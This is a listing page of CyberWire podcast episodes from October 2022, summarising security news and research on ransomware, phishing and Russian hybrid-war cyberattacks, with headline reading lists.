Bulgarian Government Hit By Cyberattack Blamed On Russian Hacking Group (RadioFreeEurope/RadioLiberty)

'The hell with it': Elon Musk tweets SpaceX will 'keep funding Ukraine govt for free' amid Starlink controversy (CNBC)

Starlink isn't a charity, but the Ukraine war isn't a business opportunity (TechCrunch)

Cyber confidence: Knowing what you have and where it is. [CyberWire-X] Oct 16, 2022

Between multi-cloud deployments, more employees working remotely, and increasing use of SaaS applications, the number of entry points for attackers to infiltrate your systems has exploded. But gaining visibility into all these possible attack vectors is time-consuming and often incomplete or just a snapshot in time.

If the first rule of cyber is to “know what you have,” how can cyber professionals get a comprehensive, current picture of their assets? How can they feel confident that they understand which assets may be more vulnerable and prioritize defenses accordingly?

In the first half of this episode of Cyberwire-X, the CyberWire's CSO, Chief Analyst, and Senior Fellow, Rick Howard, is joined by Hash Table member Jaclyn Miller, the Head of InfoSec & IT at DispatchHealth. In the second half of the episode, Cody Pierce, Chief Product Officer at episode sponsor LookingGlass Cyber Solutions, talks with Dave Bittner. Listen to the discussions about answering the foundational cyber questions (What do I have? Is it protected?), why context is critical, and how an adversarial perspective helps you be a better defender.

Amanda Adams: Pivoting into the tech world. [VP] [Career Notes] Oct 16, 2022

Amanda Adams, VP of Americas Alliances at CrowdStrike sits down to share her story as she pivoted into the tech field. She started her career by wanted to be involved with sports, after getting her masters degree Amanda was faced with a difficult choice between working for The Golden State Warriors and Cisco. She ultimately chose Cisco as her path to move forward and has been working in technology ever since. Now she works for a team where she gets to prove her social skills and is focused on partnerships. She say's that working in technology doesn't just have to be working with technology, there are many other ways you can get involved with the field. Amanda says "you can always pivot into the technology industry and support the broader mission by doing that job function." We thank Amanda for sharing her story.

Noberus ransomware: evolving tactics. [Research Saturday] Oct 15, 2022

Brigid O Gorman from Symantec's Threat Hunter team joins Dave to discuss their research on "Noberus Ransomware - Darkside and BlackMatter Successor Continues to Evolve its Tactics." The research states that Noberus ransomware (aka BlackCat, ALPHV) is more dangerous than ever because attackers have been using new tactics, tools, and procedures in recent months.

In the research, Symantec says, "Among some of the more notable developments has been the use of a new version of the Exmatter data exfiltration tool, and the use of Eamfo, information-stealing malware that is designed to steal credentials stored by Veeam backup software." They go over an in-depth look at how its affiliate program operates.

The research can be found here:

Noberus Ransomware: Darkside and BlackMatter Successor Continues to Evolve its Tactics

Phishing for poll watchers. Impersonating Intrusion Truth. Data breach at the LDS Church. SpaceX asks for help paying for Ukraine’s Starlink. Killnet’s potential. The gamer’s attack surface. Oct 14, 2022

County election workers find themselves targets of phishing. Impersonating Intrusion Truth. The LDS Church discloses data compromise. SpaceX asks for Starlink funding. Does Killnet have potential to do more damage than it so far has? Deepen Desai from Zscaler on Joker, Facestealer and Coper banking malwares on the Google Play store. Our guest is Maxime Lamothe-Brassard of LimaCharlie to discuss how the cybersecurity is following in the footsteps of software engineering. And the Gamers’ attack surface? It’s big, big, really big, Noobs.

For links to all of today's stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/11/198

Selected reading.

2022 Election Phishing Attacks Target Election Workers (Trellix)

Suspicious Twitter accounts impersonating research group try to blame the NSA for Chinese hacks (The Daily Dot)

Statement and FAQ on Church Account Data Incident (Church of Jesus Christ of Latter Day Saints)

Exclusive: Musk's SpaceX says it can no longer pay for critical satellite services in Ukraine, asks Pentagon to pick up the tab (CNN)

Killnet: don't underestimate the “script kiddies,” experts say (Cybernews)

Gaming Is Booming. That’s Catnip for Cybercriminals. (New York Times)

What the cybercriminals are up to: improving their tools and carrying out the same old dreary social engineering. Budworm APT sightings. And the state of Russia’s hybrid war. Oct 13, 2022

Emotet ups its game. COVID-19 small business grants as phishbait. Google Translate is spoofed for credential harvesting. Research on the Budworm espionage group. Kevin Magee from Microsoft shares why cybersecurity professionals should join company boards. Our guest is Chris Niggel from Okta with a look at identity shortfalls. And Internet outages during missile strikes, and the prospects of Russia’s hybrid war.

For links to all of today's stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/11/197

Selected reading.

Emotote’s evolution. (ESET)

Fresh Phish: Small Business COVID-19 Grants Designed for Disaster (INKY)

Spoofing Google Translate to Steal Credentials (Avanan)

Budworm: Espionage Group Returns to Targeting U.S. Organizations (Symantec Blog)

Internet outages hit Ukraine following Russian missile strikes (Bitdefender)

Starlink helped restore energy, communications infrastructure in parts of Ukraine - official (Reuters)

Ukraine’s Vice PM Thanks Starlink for Help to Restore Connections After Missile Attack from Russia (Tech Times)

We must tackle Europe’s winter cyber threats head-on (POLITICO)

The conflict in Ukraine makes us rethink cyberwar (The Japan Times)

Caffeine in the C2C market. Refund-fraud-as-a-service. Costs of a nuisance. Staying alert during a hybrid war. Renewed Polonium activity. The Uber case's impact on security professionals. Oct 12, 2022

Refund fraud as a service. Costs of a nuisance. Remaining on alert during a hybrid war. Renewed activity by Polonium. Andrea Little Limbago from Interos discussing quantum computing policy. CyberWire Space Correspondent Maria Varmazis speaks with Dr. Gregory Falco on lessons learned from Russia’s attack on Viasat. Reflections on the Uber case's impact on security professionals. And when it comes to phishing-as-a-service, we’ll take decaf.

For links to all of today's stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/11/196

Selected reading.

The Fresh Phish Market: Behind the Scenes of the Caffeine Phishing-as-a-Service Platform (Mandiant)

Caffeine phishing. (CyberWire)

Refund Fraud as a Service (Netacea)

Amid reports of JP Morgan cyberattack, experts call Killnet unsophisticated, ‘media hungry’ (SC Media)

Hacktivists Force Companies to Respond to Low-Level Cyberattacks (Wall Street Journal)

Nato warns Russian sabotage on Western targets 'could trigger Article 5' (The Telegraph)

US Not Ruling Out Russian Cyber Offensive (VOA)

Ukraine at D+230: Escalation, but unlikely to be sustainable. (CyberWire)

POLONIUM targets Israel with Creepy malware (WeLiveSecurity)

Hacking group POLONIUM uses ‘Creepy’ malware against Israel (BleepingComputer)

Security chiefs fear ‘CISO scapegoating’ following Uber-Sullivan verdict (The Record)

Sullivan verdict sends shockwaves through the security industry (Security Info Watch)

Reflections on the Uber case's impact on security. (CyberWire)

An update on the hybrid war, where Russia turns to missile strikes, physical sabotage, and nuisance-level DDoS. Surveys look at the state of the SOC and the mind of the CISO. Oct 11, 2022

Russia's Killnet suspected in DDoS attack on major US airports. Starlink service interruptions reported. Bundesbahn communications network sabotaged in northern Germany. Germany's cybersecurity chief faces scrutiny over alleged ties to Russia. Ben Yelin on the FCC's crackdown on robocalls. Ann Johnson from Afternoon Cyber Tea talking with Sounil Yu from JupiterOne about the importance and evolution of cyber resilience. Overworked CISOs may be a security risk, but in an encouraging counterpoint, another study shows a record of CISO success during the pandemic.

For links to all of today's stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/11/195